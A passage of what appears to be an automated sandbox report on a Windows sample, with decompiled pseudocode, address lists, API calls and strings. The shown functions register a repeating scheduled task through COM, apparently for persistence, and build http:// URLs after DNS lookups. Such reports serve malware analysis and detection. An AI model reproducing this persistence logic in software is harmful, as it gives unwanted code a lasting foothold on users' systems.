																																} else {
																																	_t541 =  *_t540;
																																}
																																asm("movdqu xmm0, [ebp-0xd8]");
																																_t469 = _v24;
																																asm("movdqu [eax], xmm0");
																																_t544 = _t544 - 0xfffffffffffffff0;
																																asm("movdqu xmm0, [ebp-0xc8]");
																																asm("movdqu [eax], xmm0");
																																asm("movdqu xmm0, [ebp-0xb8]");
																																asm("movdqu [eax], xmm0");
																																_t542 =  *((intOrPtr*)( *_t469 + 0x44))(_t469, _t541, _v20, 6, 3,  &_v96);
																																E0040B1D0( &_v28,  *_t469);
																																_t398 = __imp__#9;
																																 *_t398( &_v156);
																																 *_t398( &_v140);
																																_v8 = 1;
																																 *_t398( &_v172);
																																__eflags = _t542;
																																if(_t542 >= 0) {
																																	_t378 = _v24;
																																	 *((intOrPtr*)( *_t378 + 8))(_t378);
																																	_t380 = _v20;
																																	 *((intOrPtr*)( *_t380 + 8))(_t380);
																																	_t382 = _v96;
																																	 *((intOrPtr*)( *_t382 + 8))(_t382);
																																	__imp__CoUninitialize();
																																	_t395 = 1;
																																} else {
																																	swprintf( &_v1348, 0x400, "RegisterTaskDefinition. Err: %X\n", _t542);
																																	_t544 = _t544 + 0x10;
																																	goto L73;
																																}
																															}
																														} else {
																															_t386 = _v44;
																															 *((intOrPtr*)( *_t386 + 8))(_t386);
																															goto L73;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								} else {
									_t388 = _v24;
									 *((intOrPtr*)( *_t388 + 8))(_t388);
									__imp__CoUninitialize();
									_t395 = 0;
								}
							} else {
								_t390 = _v32;
								 *((intOrPtr*)( *_t390 + 8))(_t390);
								__imp__CoUninitialize();
								_t395 = 0;
							}
						} else {
							_t392 = _v32;
							 *((intOrPtr*)( *_t392 + 8))(_t392);
							__imp__CoUninitialize();
							_t395 = 0;
						}
					}
					__eflags = _v100 - 8;
					if(_v100 >= 8) {
						L00422587(_v120);
						_t544 = _t544 + 4;
					}
					__eflags = 0;
					_v100 = 7;
					_v104 = 0;
					_v120 = 0;
				} else {
					_t395 = 0;
				}
				if(_a24 >= 8) {
					L00422587(_a4);
				}
				 *[fs:0x0] = _v16;
				return _t395;
			}

0x0040d24a
0x0040d251
0x0040d258
0x0040d261
0x0040d265
0x0040d26c
0x0040d274
0x0040d28f
0x0040d297
0x0040d2a1
0x0040d2ab
0x0040d2b3
0x0040d2b8
0x0040d2bb
0x0040d2ce
0x0040d2d5
0x0040d2db
0x0040d2dd
0x0040da3c
0x0040da3c
0x0040da42
0x0040d2e3
0x0040d2e3
0x0040d2f0
0x0040d2f2
0x0040d301
0x0040d309
0x0040d30b
0x0040d31a
0x0040d322
0x0040d324
0x0040d333
0x0040d33b
0x0040d33d
0x0040d344
0x0040d34c
0x0040d356
0x0040d35f
0x0040d367
0x0040d36d
0x0040d370
0x0040d378
0x0040d37e
0x0040d387
0x0040d38b
0x0040d397
0x0040d3a4
0x0040d3b1
0x0040d3bd
0x0040d3c2
0x0040d3c8
0x0040d3ca
0x0040d3ea
0x0040d3f1
0x0040d3f6
0x0040d3fa
0x0040d3fc
0x0040d3fe
0x0040d404
0x0040d404
0x0040d400
0x0040d400
0x0040d400
0x0040d406
0x0040d411
0x0040d417
0x0040d41d
0x0040d422
0x0040d424
0x0040d444
0x0040d449
0x0040d44d
0x0040d44f
0x0040d451
0x0040d457
0x0040d457
0x0040d453
0x0040d453
0x0040d453
0x0040d459
0x0040d462
0x0040d468
0x0040d46c
0x0040d471
0x0040d478
0x0040d484
0x0040d487
0x0040d48f
0x0040d492
0x0040d494
0x0040d4ac
0x0040d4b2
0x0040d4c0
0x0040d4c2
0x0040da2a
0x0040da2a
0x0040da30
0x0040da33
0x0040da39
0x00000000
0x0040d4c8
0x0040d4d0
0x0040d4d5
0x0040d4d9
0x0040d4db
0x0040d4dd
0x0040d4e3
0x0040d4e3
0x0040d4df
0x0040d4df
0x0040d4df
0x0040d4e5
0x0040d4ec
0x0040d4f2
0x0040d4f8
0x0040d4fd
0x0040d503
0x0040d506
0x0040d508
0x00000000
0x0040d50e
0x0040d50e
0x0040d514
0x0040d51f
0x0040d522
0x0040d524
0x00000000
0x0040d52a
0x0040d52a
0x0040d532
0x0040d535
0x0040d53d
0x0040d540
0x0040d542
0x00000000
0x0040d548
0x0040d548
0x0040d54e
0x0040d559
0x0040d55c
0x0040d55e
0x00000000
0x0040d564
0x0040d564
0x0040d56c
0x0040d56f
0x0040d577
0x0040d57a
0x0040d57c
0x00000000
0x0040d582
0x0040d582
0x0040d588
0x0040d599
0x0040d59b
0x00000000
0x0040d5a1
0x0040d5a9
0x0040d5ae
0x0040d5b2
0x0040d5b4
0x0040d5b6
0x0040d5bc
0x0040d5bc
0x0040d5b8
0x0040d5b8
0x0040d5b8
0x0040d5be
0x0040d5c5
0x0040d5cb
0x0040d5d1
0x0040d5d6
0x0040d5dc
0x0040d5df
0x0040d5e1
0x00000000
0x0040d5e7
0x0040d5e7
0x0040d5ed
0x0040d5f8
0x0040d5fb
0x0040d5fd
0x00000000
0x0040d603
0x0040d603
0x0040d60a
0x0040d616
0x0040d619
0x0040d621
0x0040d624
0x0040d626
0x00000000
0x0040d62c
0x0040d62c
0x0040d633
0x0040d642
0x0040d644
0x0040d64c
0x0040d64f
0x0040d651
0x00000000
0x0040d657
0x0040d657
0x0040d664
0x0040d666
0x00000000
0x0040d66c
0x0040d674
0x0040d679
0x0040d67d
0x0040d67f
0x0040d681
0x0040d687
0x0040d687
0x0040d683
0x0040d683
0x0040d683
0x0040d689
0x0040d690
0x0040d696
0x0040d69c
0x0040d6a1
0x0040d6a3
0x00000000
0x0040d6a9
0x0040d6b1
0x0040d6b6
0x0040d6ba
0x0040d6bc
0x0040d6be
0x0040d6c4
0x0040d6c4
0x0040d6c0
0x0040d6c0
0x0040d6c0
0x0040d6c6
0x0040d6cd
0x0040d6d3
0x0040d6d9
0x0040d6de
0x0040d6e0
0x00000000
0x0040d6e6
0x0040d6e6
0x0040d6f2
0x0040d6f4
0x00000000
0x0040d6fa
0x0040d702
0x0040d707
0x0040d70b
0x0040d70d
0x0040d70f
0x0040d715
0x0040d715
0x0040d711
0x0040d711
0x0040d711
0x0040d717
0x0040d71e
0x0040d724
0x0040d72a
0x0040d72f
0x0040d731
0x00000000
0x0040d737
0x0040d73f
0x0040d744
0x0040d748
0x0040d74a
0x0040d74c
0x0040d752
0x0040d752
0x0040d74e
0x0040d74e
0x0040d74e
0x0040d754
0x0040d75b
0x0040d761
0x0040d767
0x0040d76c
0x0040d76e
0x00000000
0x0040d774
0x0040d778
0x0040d77f
0x0040d780
0x0040d787
0x0040d79e
0x0040d7a9
0x0040d7b0
0x0040d7be
0x0040d7c3
0x0040d7c6
0x0040d7ca
0x0040d7ce
0x0040d7d0
0x0040d7d0
0x0040d7d6
0x0040d7db
0x0040d7df
0x0040d7e1
0x0040d7e3
0x0040d7e9
0x0040d7e9
0x0040d7e5
0x0040d7e5
0x0040d7e5
0x0040d7eb
0x0040d7f2
0x0040d7fa
0x0040d805
0x0040d809
0x0040d80e
0x0040d814
0x0040d817
0x0040d819
0x00000000
0x0040d81f
0x0040d81f
0x0040d825
0x0040d830
0x0040d833
0x0040d835
0x00000000
0x0040d83b
0x0040d83b
0x0040d842
0x0040d84e
0x0040d851
0x0040d859
0x0040d85c
0x0040d85e
0x00000000
0x0040d864
0x0040d864
0x0040d86b
0x0040d87a
0x0040d87c
0x0040d884
0x0040d887
0x0040d889
0x00000000
0x0040d88f
0x0040d88f
0x0040d899
0x0040d89e
0x0040d8a3
0x0040d8a7
0x0040d8a9
0x0040d8ab
0x0040d8b1
0x0040d8b1
0x0040d8ad
0x0040d8ad
0x0040d8ad
0x0040d8b3
0x0040d8ba
0x0040d8c0
0x0040d8c6
0x0040d8cb
0x0040d8cd
0x0040d8e5
0x0040d8ea
0x0040d8ee
0x0040d8f0
0x0040d8f2
0x0040d8f8
0x0040d8f8
0x0040d8f4
0x0040d8f4
0x0040d8f4
0x0040d8fa
0x0040d901
0x0040d907
0x0040d90b
0x0040d90d
0x0040d912
0x0040d918
0x0040d91b
0x0040d91d
0x00000000
0x0040d923
0x0040d92a
0x0040d931
0x0040d936
0x0040d941
0x0040d949
0x0040d94b
0x0040d95a
0x0040d962
0x0040d964
0x0040d96b
0x0040d978
0x0040d980
0x0040d985
0x0040d989
0x0040d98b
0x0040d98d
0x0040d993
0x0040d993
0x0040d98f
0x0040d98f
0x0040d98f
0x0040d995
0x0040d99d
0x0040d9b0
0x0040d9b6
0x0040d9b9
0x0040d9c1
0x0040d9c7
0x0040d9d4
0x0040d9e0
0x0040d9e2
0x0040d9e7
0x0040d9f4
0x0040d9fd
0x0040da05
0x0040da0a
0x0040da0c
0x0040da0e
0x0040da46
0x0040da4c
0x0040da4f
0x0040da55
0x0040da58
0x0040da5e
0x0040da61
0x0040da67
0x0040da10
0x0040da22
0x0040da27
0x00000000
0x0040da27
0x0040da0e
0x0040d8cf
0x0040d8cf
0x0040d8d5
0x00000000
0x0040d8d5
0x0040d8cd
0x0040d889
0x0040d85e
0x0040d835
0x0040d819
0x0040d76e
0x0040d731
0x0040d6f4
0x0040d6e0
0x0040d6a3
0x0040d666
0x0040d651
0x0040d626
0x0040d5fd
0x0040d5e1
0x0040d59b
0x0040d57c
0x0040d55e
0x0040d542
0x0040d524
0x0040d508
0x0040d496
0x0040d496
0x0040d49c
0x0040d49f
0x0040d4a5
0x0040d4a5
0x0040d426
0x0040d426
0x0040d42c
0x0040d42f
0x0040d435
0x0040d435
0x0040d3cc
0x0040d3cc
0x0040d3d2
0x0040d3d5
0x0040d3db
0x0040d3db
0x0040d3ca
0x0040da69
0x0040da6d
0x0040da72
0x0040da77
0x0040da77
0x0040da7a
0x0040da7c
0x0040da83
0x0040da8a
0x0040d276
0x0040d276
0x0040d276
0x0040da92
0x0040da97
0x0040da9c
0x0040daa6
0x0040dab1

APIs

CoInitialize.OLE32(00000000), ref: 0040D26C
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0040D28F
CoCreateInstance.OLE32(004D506C,00000000,00000001,004D4FEC,?,?,00000000,000000FF), ref: 0040D2D5
VariantInit.OLEAUT32(?), ref: 0040D2F0
VariantInit.OLEAUT32(?), ref: 0040D309
VariantInit.OLEAUT32(?), ref: 0040D322
VariantInit.OLEAUT32(?), ref: 0040D33B
VariantClear.OLEAUT32(?), ref: 0040D397
VariantClear.OLEAUT32(?), ref: 0040D3A4
VariantClear.OLEAUT32(?), ref: 0040D3B1
VariantClear.OLEAUT32(?), ref: 0040D3C2
CoUninitialize.OLE32 ref: 0040D3D5

Strings

--Task, xrefs: 0040D8DD
RegisterTaskDefinition. Err: %X, xrefs: 0040DA11
%Y-%m-%dT%H:%M:%S, xrefs: 0040D790
Author Name, xrefs: 0040D4C8
Trigger1, xrefs: 0040D6FA
2030-05-02T08:00:00, xrefs: 0040D737
Time Trigger Task, xrefs: 0040D43C, 0040D973
PT5M, xrefs: 0040D5A1, 0040D66C

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
API String ID: 2496729271-1738591096
Opcode ID: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
Instruction ID: 4ad9c2e8017b41c765d67f99bb49247a0c13fc41f24acee5688789d455a97b09
Opcode Fuzzy Hash: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
Instruction Fuzzy Hash: 05526F70E00219DFDB10DFA8C858FAEBBB4EF49304F1481A9E505BB291DB74AD49CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040DD40 Relevance: 53.2, APIs: 22, Strings: 8, Instructions: 735
stringnetworkmemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E0040DD40(char* __ecx, char _a4, intOrPtr _a20, signed int _a24) {
				char _v8;
				intOrPtr _v16;
				char _v17;
				char _v18;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				char _v60;
				char _v76;
				signed int _v80;
				char _v84;
				char _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				char _v120;
				intOrPtr _v124;
				void* _v128;
				signed int _v132;
				short* _v136;
				signed int _v140;
				WCHAR* _v144;
				WCHAR* _v148;
				WCHAR* _v152;
				WCHAR* _v156;
				WCHAR* _v160;
				char _v168;
				char _v172;
				char _v20650;
				short _v20652;
				char _v41130;
				char _v41132;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t295;
				void* _t298;
				signed int _t305;
				WCHAR* _t308;
				void* _t309;
				signed int _t314;
				void* _t315;
				signed int _t326;
				signed int _t329;
				WCHAR* _t337;
				intOrPtr* _t344;
				signed int _t347;
				void _t351;
				signed int _t353;
				char* _t355;
				intOrPtr _t356;
				signed int _t362;
				signed int _t379;
				signed int _t387;
				signed int _t402;
				signed int _t403;
				signed int _t405;
				signed int _t407;
				signed int _t409;
				char* _t411;
				signed int _t412;
				signed int _t417;
				signed int _t425;
				signed int _t437;
				intOrPtr* _t438;
				short* _t439;
				signed int _t440;
				signed int _t442;
				signed int _t444;
				void* _t445;
				intOrPtr* _t450;
				signed int _t451;
				signed int _t452;
				char* _t455;
				void* _t457;
				intOrPtr _t459;
				signed int _t462;
				signed int _t463;
				unsigned int _t471;
				signed int _t472;
				char* _t475;
				unsigned int _t484;
				signed int _t485;
				void* _t488;
				intOrPtr* _t493;
				signed int _t494;
				signed int _t496;
				char* _t502;
				void* _t505;
				void* _t509;
				unsigned int _t511;
				unsigned int _t515;
				intOrPtr _t518;
				unsigned int _t520;
				unsigned int _t524;
				signed int _t526;
				signed int _t527;
				void* _t532;
				intOrPtr _t533;
				signed int _t534;
				void* _t538;
				signed int _t539;
				signed int _t540;
				void* _t541;
				signed int _t542;
				signed int _t544;
				signed int _t546;
				signed int _t547;
				void* _t548;
				char* _t551;
				intOrPtr _t553;
				void* _t554;
				signed int _t555;
				signed int _t558;
				char* _t559;
				void* _t560;
				intOrPtr _t561;
				void* _t562;
				void* _t563;
				void* _t564;
				void* _t565;
				char* _t567;

				_t446 = __ecx;
				_push(0xffffffff);
				_push(0x4ca9a8);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t561;
				E0042F7C0(0xa0a0);
				_push(_t437);
				_push(_t541);
				_push(_t532);
				_v136 = __ecx;
				_v172 = 0;
				_v8 = 0;
				_push(L"http://");
				_t294 =  >=  ? _a4 :  &_a4;
				_push( >=  ? _a4 :  &_a4);
				_t295 = E00421C02(__ecx);
				_t562 = _t561 + 8;
				if(_t295 != 0) {
					_push(7);
					_t446 =  &_a4;
					E00413340(_t437,  &_a4, _t532, _t541, 0);
				}
				_push(L"https://");
				_t297 =  >=  ? _a4 :  &_a4;
				_push( >=  ? _a4 :  &_a4);
				_t298 = E00421C02(_t446);
				_t563 = _t562 + 8;
				if(_t298 != 0) {
					_push(8);
					E00413340(_t437,  &_a4, _t532, _t541, 0);
				}
				_v41132 = 0;
				E0042B420( &_v41130, 0, 0x4ffe);
				_t533 = lstrlenW;
				_t564 = _t563 + 0xc;
				_t447 = _a24;
				_t542 = 0;
				_t502 = _a4;
				while(1) {
					_t303 =  >=  ? _t502 :  &_a4;
					if(_t542 >= lstrlenW( >=  ? _t502 :  &_a4)) {
						break;
					}
					if(_a20 <= _t542) {
						_push("invalid string position");
						E0044F26C(__eflags);
						L16:
						_t493 = _t502;
						_t52 = _t493 + 1; // 0x1
						_t554 = _t52;
						goto L17;
						L19:
						_push(_t494);
						E004156D0(_t437,  &_v100, _t533, _t502);
						_v8 = 3;
						_t305 =  &_v100;
						_t496 = _v40;
						__eflags = _t305 - _t496;
						if(_t305 >= _t496) {
							L29:
							__eflags = _t496 - _t533;
							if(_t496 == _t533) {
								_t305 = E00415230(_t437,  &_v44, _t533, _t496);
								_t533 = _v36;
								_t496 = _v40;
							}
							__eflags = _t496;
							if(_t496 != 0) {
								 *(_t496 + 0x14) = 0xf;
								 *((intOrPtr*)(_t496 + 0x10)) = 0;
								 *_t496 = 0;
								__eflags = _v80 - 0x10;
								if(_v80 >= 0x10) {
									 *_t496 = _v100;
									_v100 = 0;
								} else {
									_t417 = _v84 + 1;
									__eflags = _t417;
									if(_t417 != 0) {
										E004205A0(_t496,  &_v100, _t417);
										_t496 = _v40;
										_t564 = _t564 + 0xc;
									}
								}
								 *((intOrPtr*)(_t496 + 0x10)) = _v84;
								_t305 = _v80;
								 *(_t496 + 0x14) = _t305;
								_v80 = 0xf;
								_v84 = 0;
								_v100 = 0;
							}
							L37:
							_t447 = _t496 + 0x18;
							_v8 = 2;
							__eflags = _v80 - 0x10;
							_v40 = _t496 + 0x18;
							if(_v80 >= 0x10) {
								_t305 = L00422587(_v100);
								_t564 = _t564 + 4;
							}
							_t555 = _v44;
							L40:
							_t437 = _t437 + 1;
							__eflags = _t437 - 4;
							if(_t437 < 4) {
								L11:
								__imp__#52( *((intOrPtr*)(_t560 + _t437 * 4 - 0x9c)));
								__eflags = _t305;
								if(_t305 == 0) {
									goto L40;
								}
								__eflags =  *((short*)(_t305 + 0xa));
								if( *((short*)(_t305 + 0xa)) <= 0) {
									goto L40;
								}
								_t411 =  *((intOrPtr*)( *((intOrPtr*)(_t305 + 0xc))));
								__imp__#12( *_t411);
								_t502 = _t411;
								_v80 = 0xf;
								_v84 = 0;
								_v100 = 0;
								__eflags =  *_t502;
								if( *_t502 != 0) {
									goto L16;
								} else {
									_t494 = 0;
									goto L19;
								}
							}
							__eflags = _a24 - 8;
							_push("/");
							_t307 =  >=  ? _a4 :  &_a4;
							_push( >=  ? _a4 :  &_a4);
							_t308 = E00421C02(_t447);
							_t565 = _t564 + 8;
							_v144 = _t308;
							_t309 = LocalAlloc(0x40, 8);
							_t534 = _v40;
							_t544 = 0;
							_t438 = _v44;
							_v128 = _t309;
							_v52 = 0;
							_v116 = 0;
							_t314 = (0x2aaaaaab * (_t534 - _t438) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t534 - _t438) >> 0x20 >> 2);
							__eflags = _t314;
							_v108 = _t314;
							if(_t314 == 0) {
								L121:
								_t315 = _v128;
								__eflags = _t315;
								if(_t315 != 0) {
									LocalFree(_t315);
								}
								__imp__DnsFree(_v104, 1);
								_v20652 = 0;
								E0042B420( &_v20650, 0, 0x4ffe);
								_t565 = _t565 + 0xc;
								lstrcpyW( &_v20652, L"http://");
								__eflags = _t544;
								if(_t544 == 0) {
									L130:
									__eflags = _a24 - 8;
									_t322 =  >=  ? _a4 :  &_a4;
									lstrcatW( &_v20652,  >=  ? _a4 :  &_a4);
									goto L131;
								} else {
									_t567 = _t565 - 0x18;
									_t455 = _t567;
									_push(0xffffffff);
									 *(_t455 + 0x14) = 0xf;
									 *((intOrPtr*)(_t455 + 0x10)) = 0;
									 *_t455 = 0;
									E00413FF0(0, _t455, _v32, 0);
									_t337 = E00412900( &_v168, 0);
									_t565 = _t567 + 0x18;
									__eflags = _t337[0xa] - 8;
									if(_t337[0xa] >= 8) {
										_t337 =  *_t337;
									}
									_t544 = lstrcatW;
									lstrcatW( &_v20652, _t337);
									__eflags = _v148 - 8;
									if(_v148 >= 8) {
										L00422587(_v168);
										_t565 = _t565 + 4;
									}
									lstrcatW( &_v20652, _v144);
									L131:
									_t439 = _v136;
									 *((intOrPtr*)(_t439 + 0x14)) = 7;
									 *((intOrPtr*)(_t439 + 0x10)) = 0;
									 *_t439 = 0;
									__eflags = _v20652;
									if(_v20652 != 0) {
										_t450 =  &_v20652;
										_t505 = _t450 + 2;
										do {
											_t326 =  *_t450;
											_t450 = _t450 + 2;
											__eflags = _t326;
										} while (_t326 != 0);
										_t451 = _t450 - _t505;
										__eflags = _t451;
										_t452 = _t451 >> 1;
										L136:
										_push(_t452);
										E00415C10(_t439, _t439, _t534, _t544,  &_v20652);
										_t329 = _v32;
										__eflags = _t329;
										if(_t329 == 0) {
											L144:
											_t440 = _v44;
											__eflags = _t440;
											if(_t440 == 0) {
												L150:
												__eflags = _a24 - 8;
												if(_a24 >= 8) {
													L00422587(_a4);
												}
												 *[fs:0x0] = _v16;
												return _v136;
											}
											_t546 = _t440;
											__eflags = _t440 - _t534;
											if(_t440 == _t534) {
												L149:
												L00422587(_t440);
												_t565 = _t565 + 4;
												goto L150;
											} else {
												goto L146;
											}
											do {
												L146:
												__eflags =  *(_t546 + 0x14) - 0x10;
												if( *(_t546 + 0x14) >= 0x10) {
													L00422587( *_t546);
													_t565 = _t565 + 4;
												}
												 *(_t546 + 0x14) = 0xf;
												 *((intOrPtr*)(_t546 + 0x10)) = 0;
												 *_t546 = 0;
												_t546 = _t546 + 0x18;
												__eflags = _t546 - _t534;
											} while (_t546 != _t534);
											goto L149;
										}
										_t442 = _v28;
										_t547 = _t329;
										__eflags = _t329 - _t442;
										if(_t329 == _t442) {
											L143:
											L00422587(_t329);
											_t565 = _t565 + 4;
											goto L144;
										}
										do {
											__eflags =  *(_t547 + 0x14) - 0x10;
											if( *(_t547 + 0x14) >= 0x10) {
												L00422587( *_t547);
												_t565 = _t565 + 4;
											}
											 *(_t547 + 0x14) = 0xf;
											 *((intOrPtr*)(_t547 + 0x10)) = 0;
											 *_t547 = 0;
											_t547 = _t547 + 0x18;
											__eflags = _t547 - _t442;
										} while (_t547 != _t442);
										_t329 = _v32;
										goto L143;
									}
									_t452 = 0;
									goto L136;
								}
							}
							_t344 = _t438;
							_v124 = _t438;
							do {
								__eflags =  *((intOrPtr*)(_t344 + 0x14)) - 0x10;
								if( *((intOrPtr*)(_t344 + 0x14)) >= 0x10) {
									_t344 =  *_t344;
								}
								__imp__#11(_t344);
								_t457 = _v128;
								 *((intOrPtr*)(_t457 + 4)) = _t344;
								 *_t457 = 1;
								__imp__DnsQuery_W( &_v41132, 2, 2, _t457,  &_v104, 0);
								_t347 = _v104;
								_v112 = _t347;
								__eflags = _t347;
								if(_t347 != 0) {
									_t444 = _v28;
									do {
										__imp__#12( *((intOrPtr*)(_t347 + 0x18)));
										_t544 = _t347;
										_v17 = 0;
										_v52 = _t544;
										_v120 = 0;
										_t534 = (0x2aaaaaab * (_t444 - _v32) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t444 - _v32) >> 0x20 >> 2);
										__eflags = _t534;
										_v140 = _t534;
										if(_t534 == 0) {
											L80:
											_t351 = _v17;
											L81:
											__eflags = _t351;
											if(_t351 != 0) {
												goto L118;
											}
											_v56 = 0xf;
											_v60 = 0;
											_v76 = _t351;
											__eflags =  *_t544 - _t351;
											if( *_t544 != _t351) {
												_t462 = _t544;
												_t168 = _t462 + 1; // 0x1
												_t509 = _t168;
												do {
													_t353 =  *_t462;
													_t462 = _t462 + 1;
													__eflags = _t353;
												} while (_t353 != 0);
												_t463 = _t462 - _t509;
												__eflags = _t463;
												L88:
												_push(_t463);
												E004156D0(_t444,  &_v76, _t534, _t544);
												_t355 =  &_v76;
												_v8 = 4;
												__eflags = _t355 - _t444;
												if(_t355 >= _t444) {
													L103:
													_t356 = _v48;
													__eflags = _t444 - _t356;
													if(_t444 != _t356) {
														L110:
														__eflags = _t444;
														if(_t444 != 0) {
															 *(_t444 + 0x14) = 0xf;
															 *((intOrPtr*)(_t444 + 0x10)) = 0;
															 *_t444 = 0;
															__eflags = _v56 - 0x10;
															if(_v56 >= 0x10) {
																 *_t444 = _v76;
																_v76 = 0;
															} else {
																_t362 = _v60 + 1;
																__eflags = _t362;
																if(_t362 != 0) {
																	E004205A0(_t444,  &_v76, _t362);
																	_t565 = _t565 + 0xc;
																}
															}
															 *((intOrPtr*)(_t444 + 0x10)) = _v60;
															 *(_t444 + 0x14) = _v56;
															_v56 = 0xf;
															_v60 = 0;
															_v76 = 0;
														}
														L116:
														_t444 = _t444 + 0x18;
														_v8 = 2;
														__eflags = _v56 - 0x10;
														_v28 = _t444;
														if(_v56 >= 0x10) {
															L00422587(_v76);
															_t565 = _t565 + 4;
														}
														goto L118;
													}
													_t511 = 0x2aaaaaab * (_t356 - _t444) >> 0x20 >> 2;
													__eflags = (_t511 >> 0x1f) + _t511 - 1;
													if((_t511 >> 0x1f) + _t511 >= 1) {
														goto L110;
													}
													__eflags = 0xaaaaaaa - _t534 - 1;
													if(__eflags < 0) {
														L129:
														_push("vector<T> too long");
														E0044F23E(__eflags);
														goto L130;
													}
													_t548 = _t534 + 1;
													_t471 = (0x2aaaaaab * (_v48 - _v32) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v48 - _v32) >> 0x20 >> 2);
													_t515 = _t471 >> 1;
													__eflags = 0xaaaaaaa - _t515 - _t471;
													if(0xaaaaaaa - _t515 >= _t471) {
														_t472 = _t471 + _t515;
														__eflags = _t472;
													} else {
														_t472 = 0;
													}
													__eflags = _t472 - _t548;
													_t473 =  <  ? _t548 : _t472;
													__eflags =  <  ? _t548 : _t472;
													E00416360(_t444,  &_v32, _t534, _t548,  <  ? _t548 : _t472);
													_t444 = _v28;
													_v48 = _v24;
													goto L110;
												}
												_t475 = _t355;
												_t379 = _v32;
												__eflags = _t379 - _t475;
												if(_t379 > _t475) {
													goto L103;
												}
												_t544 = (0x2aaaaaab * (_t475 - _t379) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t475 - _t379) >> 0x20 >> 2);
												_t518 = _v48;
												__eflags = _t444 - _t518;
												if(_t444 != _t518) {
													L97:
													_t551 = _v32 + (_t544 + _t544 * 2) * 8;
													__eflags = _t444;
													if(_t444 != 0) {
														 *(_t444 + 0x14) = 0xf;
														 *((intOrPtr*)(_t444 + 0x10)) = 0;
														 *_t444 = 0;
														__eflags =  *(_t551 + 0x14) - 0x10;
														if( *(_t551 + 0x14) >= 0x10) {
															 *_t444 =  *_t551;
															 *_t551 = 0;
														} else {
															_t387 =  *((intOrPtr*)(_t551 + 0x10)) + 1;
															__eflags = _t387;
															if(_t387 != 0) {
																E004205A0(_t444, _t551, _t387);
																_t565 = _t565 + 0xc;
															}
														}
														 *((intOrPtr*)(_t444 + 0x10)) =  *((intOrPtr*)(_t551 + 0x10));
														 *(_t444 + 0x14) =  *(_t551 + 0x14);
														 *(_t551 + 0x14) = 0xf;
														 *((intOrPtr*)(_t551 + 0x10)) = 0;
														 *_t551 = 0;
													}
													goto L116;
												}
												_t520 = 0x2aaaaaab * (_t518 - _t444) >> 0x20 >> 2;
												__eflags = (_t520 >> 0x1f) + _t520 - 1;
												if((_t520 >> 0x1f) + _t520 >= 1) {
													goto L97;
												}
												__eflags = 0xaaaaaaa - _t534 - 1;
												if(__eflags < 0) {
													goto L129;
												}
												_t538 = _t534 + 1;
												_t484 = (0x2aaaaaab * (_v48 - _v32) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v48 - _v32) >> 0x20 >> 2);
												_t524 = _t484 >> 1;
												__eflags = 0xaaaaaaa - _t524 - _t484;
												if(0xaaaaaaa - _t524 >= _t484) {
													_t485 = _t484 + _t524;
													__eflags = _t485;
												} else {
													_t485 = 0;
												}
												__eflags = _t485 - _t538;
												_t486 =  <  ? _t538 : _t485;
												E00416360(_t444,  &_v32, _t538, _t544,  <  ? _t538 : _t485);
												_t444 = _v28;
												_v48 = _v24;
												goto L97;
											}
											_t463 = 0;
											goto L88;
										}
										_t402 =  *_t544;
										_t526 = _v32 + 0x10;
										__eflags = _t526;
										_v18 = _t402;
										_v132 = _t526;
										do {
											__eflags = _t402;
											if(_t402 != 0) {
												_t539 = _t544;
												_t141 = _t539 + 1; // 0x1
												_t488 = _t141;
												do {
													_t403 =  *_t539;
													_t539 = _t539 + 1;
													__eflags = _t403;
												} while (_t403 != 0);
												_t540 = _t539 - _t488;
												__eflags = _t540;
												L54:
												__eflags =  *((intOrPtr*)(_t526 + 4)) - 0x10;
												_t445 =  *_t526;
												if( *((intOrPtr*)(_t526 + 4)) < 0x10) {
													_t527 = _t526 + 0xfffffff0;
													__eflags = _t527;
												} else {
													_t527 =  *(_t526 - 0x10);
												}
												__eflags = _t445 - _t540;
												_t405 =  <  ? _t445 : _t540;
												__eflags = _t405;
												if(_t405 == 0) {
													L73:
													__eflags = _t445 - _t540;
													if(_t445 >= _t540) {
														__eflags = _t445 - _t540;
														_t151 = _t445 != _t540;
														__eflags = _t151;
														_t407 = 0 | _t151;
													} else {
														_t407 = _t405 | 0xffffffff;
													}
													__eflags = _t407;
													goto L77;
												} else {
													_t409 = _t405 - 4;
													__eflags = _t409;
													if(_t409 < 0) {
														L62:
														__eflags = _t409 - 0xfffffffc;
														if(_t409 == 0xfffffffc) {
															L71:
															_t407 = 0;
															__eflags = 0;
															L72:
															__eflags = _t407;
															if(__eflags != 0) {
																L77:
																_t534 = _v140;
																if(__eflags != 0) {
																	_t444 = _v28;
																	_t351 = 1;
																	_t544 = _v52;
																	goto L81;
																}
																goto L78;
															}
															goto L73;
														}
														L63:
														__eflags =  *_t527 -  *_t544;
														if( *_t527 !=  *_t544) {
															L70:
